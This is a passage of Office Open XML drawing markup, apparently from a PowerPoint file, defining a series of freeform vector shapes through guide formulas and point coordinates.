                      <a:pt x="8" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="35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0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="60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0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2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2" name="Freeform 127">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2FB3B6-E23B-4C0D-BE08-38C3B4169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211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1 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 16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1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3" name="Freeform 128">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EB01D8-3282-43AC-9993-EF24E800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220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0 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 1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10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1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4" name="Freeform 129">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E5E95A3-39FF-4B13-8AC4-9469E3FE0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4" y="2198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2 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 4 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 6 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 10 w 17"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 16 w 17"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 10 w 17"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 0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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2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5" name="Freeform 130">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26E7D85-512E-40AB-8241-6ABF417FA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2191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 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 2 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 4 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 8 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 12 w 17"/>
                  <a:gd name="T11" fmla="*/ 8 h 17"/>
                  <a:gd name="T12" fmla="*/ 16 w 17"/>
                  <a:gd name="T13" fmla="*/ 8 h 17"/>
                  <a:gd name="T14" fmla="*/ 10 w 17"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 8 w 17"/>
                  <a:gd name="T17" fmla="*/ 0 h 17"/>
                  <a:gd name="T18" fmla="*/ 7 w 17"/>
                  <a:gd name="T19" fmla="*/ 8 h 17"/>
                  <a:gd name="T20" fmla="*/ 7 w 17"/>
                  <a:gd name="T21" fmla="*/ 0 h 17"/>
                  <a:gd name="T22" fmla="*/ 4 w 17"/>
                  <a:gd name="T23" fmla="*/ 8 h 17"/>
                  <a:gd name="T24" fmla="*/ 2 w 17"/>
                  <a:gd name="T25" fmla="*/ 8 h 17"/>
                  <a:gd name="T26" fmla="*/ 0 w 17"/>
                  <a:gd name="T27" fmla="*/ 8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7"/>
                  <a:gd name="T44" fmla="*/ 17 w 17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7">
                    <a:moveTo>
                      <a:pt x="0" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1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7" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7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6" name="Freeform 131">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351AC524-4648-4A56-920B-2E75DAF71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0" y="2197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4 w 17"/>
                  <a:gd name="T3" fmla="*/ 1 h 17"/>
                  <a:gd name="T4" fmla="*/ 9 w 17"/>
                  <a:gd name="T5" fmla="*/ 2 h 17"/>
                  <a:gd name="T6" fmla="*/ 13 w 17"/>
                  <a:gd name="T7" fmla="*/ 4 h 17"/>
                  <a:gd name="T8" fmla="*/ 13 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 13 w 17"/>
                  <a:gd name="T11" fmla="*/ 9 h 17"/>
                  <a:gd name="T12" fmla="*/ 11 w 17"/>
                  <a:gd name="T13" fmla="*/ 11 h 17"/>
                  <a:gd name="T14" fmla="*/ 8 w 17"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 7 h 17"/>
                  <a:gd name="T18" fmla="*/ 0 w 17"/>
                  <a:gd name="T19" fmla="*/ 6 h 17"/>
                  <a:gd name="T20" fmla="*/ 4 w 17"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 9 w 17"/>
                  <a:gd name="T23" fmla="*/ 10 h 17"/>
                  <a:gd name="T24" fmla="*/ 9 w 17"/>
                  <a:gd name="T25" fmla="*/ 12 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 16 h 17"/>
                  <a:gd name="T28" fmla="*/ 6 w 17"/>
                  <a:gd name="T29" fmla="*/ 16 h 17"/>
                  <a:gd name="T30" fmla="*/ 11 w 17"/>
                  <a:gd name="T31" fmla="*/ 13 h 17"/>
                  <a:gd name="T32" fmla="*/ 16 w 17"/>
                  <a:gd name="T33" fmla="*/ 10 h 17"/>
                  <a:gd name="T34" fmla="*/ 16 w 17"/>
                  <a:gd name="T35" fmla="*/ 7 h 17"/>
                  <a:gd name="T36" fmla="*/ 16 w 17"/>
                  <a:gd name="T37" fmla="*/ 3 h 17"/>
                  <a:gd name="T38" fmla="*/ 11 w 17"/>
                  <a:gd name="T39" fmla="*/ 1 h 17"/>
                  <a:gd name="T40" fmla="*/ 6 w 17"/>
                  <a:gd name="T41" fmla="*/ 0 h 17"/>
                  <a:gd name="T42" fmla="*/ 2 w 17"/>
                  <a:gd name="T43" fmla="*/ 0 h 17"/>
                  <a:gd name="T44" fmla="*/ 0 w 17"/>
                  <a:gd name="T45" fmla="*/ 3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"/>
                  <a:gd name="T70" fmla="*/ 0 h 17"/>
                  <a:gd name="T71" fmla="*/ 17 w 17"/>
                  <a:gd name="T72" fmla="*/ 17 h 1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" h="17">
                    <a:moveTo>
                      <a:pt x="0" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="7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11" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16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7" name="Freeform 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774B8DB4-7FB7-42E5-94A4-5B9143249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2195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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 1 h 17"/>
                  <a:gd name="T4" fmla="*/ 6 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                  <a:gd name="T6" fmla="*/ 11 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 17"/>
                  <a:gd name="T8" fmla="*/ 13 w 17"/>
                  <a:gd name="T9" fmla="*/ 3 h 17"/>
                  <a:gd name="T10" fmla="*/ 13 w 17"/>
                  <a:gd name="T11" fmla="*/ 5 h 17"/>
                  <a:gd name="T12" fmla="*/ 13 w 17"/>
                  <a:gd name="T13" fmla="*/ 6 h 17"/>
                  <a:gd name="T14" fmla="*/ 13 w 17"/>
                  <a:gd name="T15" fmla="*/ 8 h 17"/>
                  <a:gd name="T16" fmla="*/ 11 w 17"/>
                  <a:gd name="T17" fmla="*/ 11 h 17"/>
                  <a:gd name="T18" fmla="*/ 8 w 17"/>
                  <a:gd name="T19" fmla="*/ 13 h 17"/>
                  <a:gd name="T20" fmla="*/ 4 w 17"/>
                  <a:gd name="T21" fmla="*/ 13 h 17"/>
                  <a:gd name="T22" fmla="*/ 4 w 17"/>
                  <a:gd name="T23" fmla="*/ 14 h 17"/>
                  <a:gd name="T24" fmla="*/ 6 w 17"/>
                  <a:gd name="T25" fmla="*/ 16 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 16 h 17"/>
                  <a:gd name="T28" fmla="*/ 11 w 17"/>
                  <a:gd name="T29" fmla="*/ 14 h 17"/>
                  <a:gd name="T30" fmla="*/ 13 w 17"/>
                  <a:gd name="T31" fmla="*/ 11 h 17"/>
                  <a:gd name="T32" fmla="*/ 16 w 17"/>
                  <a:gd name="T33" fmla="*/ 8 h 17"/>
                  <a:gd name="T34" fmla="*/ 16 w 17"/>
                  <a:gd name="T35" fmla="*/ 6 h 17"/>
                  <a:gd name="T36" fmla="*/ 16 w 17"/>
                  <a:gd name="T37" fmla="*/ 4 h 17"/>
                  <a:gd name="T38" fmla="*/ 13 w 17"/>
                  <a:gd name="T39" fmla="*/ 2 h 17"/>
                  <a:gd name="T40" fmla="*/ 11 w 17"/>
                  <a:gd name="T41" fmla="*/ 0 h 17"/>
                  <a:gd name="T42" fmla="*/ 8 w 17"/>
                  <a:gd name="T43" fmla="*/ 0 h 17"/>
                  <a:gd name="T44" fmla="*/ 3 w 17"/>
                  <a:gd name="T45" fmla="*/ 0 h 17"/>
                  <a:gd name="T46" fmla="*/ 0 w 17"/>
                  <a:gd name="T47" fmla="*/ 1 h 17"/>
                  <a:gd name="T48" fmla="*/ 0 w 17"/>
                  <a:gd name="T49" fmla="*/ 3 h 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"/>
                  <a:gd name="T76" fmla="*/ 0 h 17"/>
                  <a:gd name="T77" fmla="*/ 17 w 17"/>
                  <a:gd name="T78" fmla="*/ 17 h 1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" h="17">
                    <a:moveTo>
                      <a:pt x="0" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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3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3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11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1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11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8" name="Freeform 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B0D27A-8A4A-4939-9259-F6E47476D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" y="2213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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 3 h 17"/>
                  <a:gd name="T4" fmla="*/ 11 w 17"/>
                  <a:gd name="T5" fmla="*/ 5 h 17"/>
                  <a:gd name="T6" fmla="*/ 5 w 17"/>
                  <a:gd name="T7" fmla="*/ 10 h 17"/>
                  <a:gd name="T8" fmla="*/ 1 w 17"/>
                  <a:gd name="T9" fmla="*/ 13 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 4 w 17"/>
                  <a:gd name="T13" fmla="*/ 12 h 17"/>
                  <a:gd name="T14" fmla="*/ 9 w 17"/>
                  <a:gd name="T15" fmla="*/ 10 h 17"/>
                  <a:gd name="T16" fmla="*/ 13 w 17"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 16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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5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12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13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69" name="Freeform 134">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C0712C-5221-4EE6-8FE8-9019A44D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4" y="2163"/>
                <a:ext cx="61" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 61"/>
                  <a:gd name="T1" fmla="*/ 16 h 55"/>
                  <a:gd name="T2" fmla="*/ 14 w 61"/>
                  <a:gd name="T3" fmla="*/ 14 h 55"/>
                  <a:gd name="T4" fmla="*/ 19 w 61"/>
                  <a:gd name="T5" fmla="*/ 15 h 55"/>
                  <a:gd name="T6" fmla="*/ 23 w 61"/>
                  <a:gd name="T7" fmla="*/ 18 h 55"/>
                  <a:gd name="T8" fmla="*/ 21 w 61"/>
                  <a:gd name="T9" fmla="*/ 23 h 55"/>
                  <a:gd name="T10" fmla="*/ 18 w 61"/>
                  <a:gd name="T11" fmla="*/ 25 h 55"/>
                  <a:gd name="T12" fmla="*/ 18 w 61"/>
                  <a:gd name="T13" fmla="*/ 29 h 55"/>
                  <a:gd name="T14" fmla="*/ 18 w 61"/>
                  <a:gd name="T15" fmla="*/ 32 h 55"/>
                  <a:gd name="T16" fmla="*/ 18 w 61"/>
                  <a:gd name="T17" fmla="*/ 37 h 55"/>
                  <a:gd name="T18" fmla="*/ 21 w 61"/>
                  <a:gd name="T19" fmla="*/ 37 h 55"/>
                  <a:gd name="T20" fmla="*/ 22 w 61"/>
                  <a:gd name="T21" fmla="*/ 32 h 55"/>
                  <a:gd name="T22" fmla="*/ 24 w 61"/>
                  <a:gd name="T23" fmla="*/ 29 h 55"/>
                  <a:gd name="T24" fmla="*/ 29 w 61"/>
                  <a:gd name="T25" fmla="*/ 29 h 55"/>
                  <a:gd name="T26" fmla="*/ 33 w 61"/>
                  <a:gd name="T27" fmla="*/ 30 h 55"/>
                  <a:gd name="T28" fmla="*/ 35 w 61"/>
                  <a:gd name="T29" fmla="*/ 34 h 55"/>
                  <a:gd name="T30" fmla="*/ 36 w 61"/>
                  <a:gd name="T31" fmla="*/ 38 h 55"/>
                  <a:gd name="T32" fmla="*/ 35 w 61"/>
                  <a:gd name="T33" fmla="*/ 41 h 55"/>
                  <a:gd name="T34" fmla="*/ 35 w 61"/>
                  <a:gd name="T35" fmla="*/ 43 h 55"/>
                  <a:gd name="T36" fmla="*/ 35 w 61"/>
                  <a:gd name="T37" fmla="*/ 47 h 55"/>
                  <a:gd name="T38" fmla="*/ 38 w 61"/>
                  <a:gd name="T39" fmla="*/ 49 h 55"/>
                  <a:gd name="T40" fmla="*/ 40 w 61"/>
                  <a:gd name="T41" fmla="*/ 51 h 55"/>
                  <a:gd name="T42" fmla="*/ 45 w 61"/>
                  <a:gd name="T43" fmla="*/ 54 h 55"/>
                  <a:gd name="T44" fmla="*/ 55 w 61"/>
                  <a:gd name="T45" fmla="*/ 45 h 55"/>
                  <a:gd name="T46" fmla="*/ 58 w 61"/>
                  <a:gd name="T47" fmla="*/ 38 h 55"/>
                  <a:gd name="T48" fmla="*/ 60 w 61"/>
                  <a:gd name="T49" fmla="*/ 26 h 55"/>
                  <a:gd name="T50" fmla="*/ 60 w 61"/>
                  <a:gd name="T51" fmla="*/ 16 h 55"/>
                  <a:gd name="T52" fmla="*/ 59 w 61"/>
                  <a:gd name="T53" fmla="*/ 9 h 55"/>
                  <a:gd name="T54" fmla="*/ 55 w 61"/>
                  <a:gd name="T55" fmla="*/ 5 h 55"/>
                  <a:gd name="T56" fmla="*/ 50 w 61"/>
                  <a:gd name="T57" fmla="*/ 1 h 55"/>
                  <a:gd name="T58" fmla="*/ 44 w 61"/>
                  <a:gd name="T59" fmla="*/ 0 h 55"/>
                  <a:gd name="T60" fmla="*/ 34 w 61"/>
                  <a:gd name="T61" fmla="*/ 0 h 55"/>
                  <a:gd name="T62" fmla="*/ 23 w 61"/>
                  <a:gd name="T63" fmla="*/ 0 h 55"/>
                  <a:gd name="T64" fmla="*/ 11 w 61"/>
                  <a:gd name="T65" fmla="*/ 2 h 55"/>
                  <a:gd name="T66" fmla="*/ 5 w 61"/>
                  <a:gd name="T67" fmla="*/ 5 h 55"/>
                  <a:gd name="T68" fmla="*/ 3 w 61"/>
                  <a:gd name="T69" fmla="*/ 7 h 55"/>
                  <a:gd name="T70" fmla="*/ 0 w 61"/>
                  <a:gd name="T71" fmla="*/ 11 h 55"/>
                  <a:gd name="T72" fmla="*/ 0 w 61"/>
                  <a:gd name="T73" fmla="*/ 13 h 55"/>
                  <a:gd name="T74" fmla="*/ 5 w 61"/>
                  <a:gd name="T75" fmla="*/ 16 h 5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1"/>
                  <a:gd name="T115" fmla="*/ 0 h 55"/>
                  <a:gd name="T116" fmla="*/ 61 w 61"/>
                  <a:gd name="T117" fmla="*/ 55 h 5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1" h="55">
                    <a:moveTo>
                      <a:pt x="5" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="29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5" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="1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3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2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60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0" name="Freeform 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA591E7-3665-46C6-B7B8-C84AB53FA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63"/>
                <a:ext cx="59" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 59"/>
                  <a:gd name="T1" fmla="*/ 7 h 52"/>
                  <a:gd name="T2" fmla="*/ 1 w 59"/>
                  <a:gd name="T3" fmla="*/ 12 h 52"/>
                  <a:gd name="T4" fmla="*/ 14 w 59"/>
                  <a:gd name="T5" fmla="*/ 13 h 52"/>
                  <a:gd name="T6" fmla="*/ 26 w 59"/>
                  <a:gd name="T7" fmla="*/ 10 h 52"/>
                  <a:gd name="T8" fmla="*/ 20 w 59"/>
                  <a:gd name="T9" fmla="*/ 11 h 52"/>
                  <a:gd name="T10" fmla="*/ 20 w 59"/>
                  <a:gd name="T11" fmla="*/ 15 h 52"/>
                  <a:gd name="T12" fmla="*/ 29 w 59"/>
                  <a:gd name="T13" fmla="*/ 12 h 52"/>
                  <a:gd name="T14" fmla="*/ 24 w 59"/>
                  <a:gd name="T15" fmla="*/ 15 h 52"/>
                  <a:gd name="T16" fmla="*/ 26 w 59"/>
                  <a:gd name="T17" fmla="*/ 16 h 52"/>
                  <a:gd name="T18" fmla="*/ 22 w 59"/>
                  <a:gd name="T19" fmla="*/ 18 h 52"/>
                  <a:gd name="T20" fmla="*/ 24 w 59"/>
                  <a:gd name="T21" fmla="*/ 20 h 52"/>
                  <a:gd name="T22" fmla="*/ 24 w 59"/>
                  <a:gd name="T23" fmla="*/ 22 h 52"/>
                  <a:gd name="T24" fmla="*/ 18 w 59"/>
                  <a:gd name="T25" fmla="*/ 26 h 52"/>
                  <a:gd name="T26" fmla="*/ 28 w 59"/>
                  <a:gd name="T27" fmla="*/ 24 h 52"/>
                  <a:gd name="T28" fmla="*/ 17 w 59"/>
                  <a:gd name="T29" fmla="*/ 27 h 52"/>
                  <a:gd name="T30" fmla="*/ 24 w 59"/>
                  <a:gd name="T31" fmla="*/ 27 h 52"/>
                  <a:gd name="T32" fmla="*/ 38 w 59"/>
                  <a:gd name="T33" fmla="*/ 27 h 52"/>
                  <a:gd name="T34" fmla="*/ 33 w 59"/>
                  <a:gd name="T35" fmla="*/ 28 h 52"/>
                  <a:gd name="T36" fmla="*/ 44 w 59"/>
                  <a:gd name="T37" fmla="*/ 28 h 52"/>
                  <a:gd name="T38" fmla="*/ 39 w 59"/>
                  <a:gd name="T39" fmla="*/ 32 h 52"/>
                  <a:gd name="T40" fmla="*/ 40 w 59"/>
                  <a:gd name="T41" fmla="*/ 34 h 52"/>
                  <a:gd name="T42" fmla="*/ 38 w 59"/>
                  <a:gd name="T43" fmla="*/ 36 h 52"/>
                  <a:gd name="T44" fmla="*/ 39 w 59"/>
                  <a:gd name="T45" fmla="*/ 38 h 52"/>
                  <a:gd name="T46" fmla="*/ 34 w 59"/>
                  <a:gd name="T47" fmla="*/ 41 h 52"/>
                  <a:gd name="T48" fmla="*/ 40 w 59"/>
                  <a:gd name="T49" fmla="*/ 43 h 52"/>
                  <a:gd name="T50" fmla="*/ 43 w 59"/>
                  <a:gd name="T51" fmla="*/ 42 h 52"/>
                  <a:gd name="T52" fmla="*/ 40 w 59"/>
                  <a:gd name="T53" fmla="*/ 49 h 52"/>
                  <a:gd name="T54" fmla="*/ 49 w 59"/>
                  <a:gd name="T55" fmla="*/ 40 h 52"/>
                  <a:gd name="T56" fmla="*/ 42 w 59"/>
                  <a:gd name="T57" fmla="*/ 50 h 52"/>
                  <a:gd name="T58" fmla="*/ 53 w 59"/>
                  <a:gd name="T59" fmla="*/ 41 h 52"/>
                  <a:gd name="T60" fmla="*/ 57 w 59"/>
                  <a:gd name="T61" fmla="*/ 26 h 52"/>
                  <a:gd name="T62" fmla="*/ 48 w 59"/>
                  <a:gd name="T63" fmla="*/ 22 h 52"/>
                  <a:gd name="T64" fmla="*/ 49 w 59"/>
                  <a:gd name="T65" fmla="*/ 19 h 52"/>
                  <a:gd name="T66" fmla="*/ 58 w 59"/>
                  <a:gd name="T67" fmla="*/ 15 h 52"/>
                  <a:gd name="T68" fmla="*/ 45 w 59"/>
                  <a:gd name="T69" fmla="*/ 12 h 52"/>
                  <a:gd name="T70" fmla="*/ 51 w 59"/>
                  <a:gd name="T71" fmla="*/ 10 h 52"/>
                  <a:gd name="T72" fmla="*/ 53 w 59"/>
                  <a:gd name="T73" fmla="*/ 3 h 52"/>
                  <a:gd name="T74" fmla="*/ 39 w 59"/>
                  <a:gd name="T75" fmla="*/ 5 h 52"/>
                  <a:gd name="T76" fmla="*/ 41 w 59"/>
                  <a:gd name="T77" fmla="*/ 0 h 52"/>
                  <a:gd name="T78" fmla="*/ 29 w 59"/>
                  <a:gd name="T79" fmla="*/ 3 h 52"/>
                  <a:gd name="T80" fmla="*/ 29 w 59"/>
                  <a:gd name="T81" fmla="*/ 0 h 52"/>
                  <a:gd name="T82" fmla="*/ 20 w 59"/>
                  <a:gd name="T83" fmla="*/ 0 h 52"/>
                  <a:gd name="T84" fmla="*/ 12 w 59"/>
                  <a:gd name="T85" fmla="*/ 7 h 52"/>
                  <a:gd name="T86" fmla="*/ 9 w 59"/>
                  <a:gd name="T87" fmla="*/ 3 h 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9"/>
                  <a:gd name="T133" fmla="*/ 0 h 52"/>
                  <a:gd name="T134" fmla="*/ 59 w 59"/>
                  <a:gd name="T135" fmla="*/ 52 h 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9" h="52">
                    <a:moveTo>
                      <a:pt x="9" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="5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9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="11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24" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11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20" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="13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26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="18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24" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="23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5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8" y="26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0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="27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8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="30"/>
                    </a:lnTo>
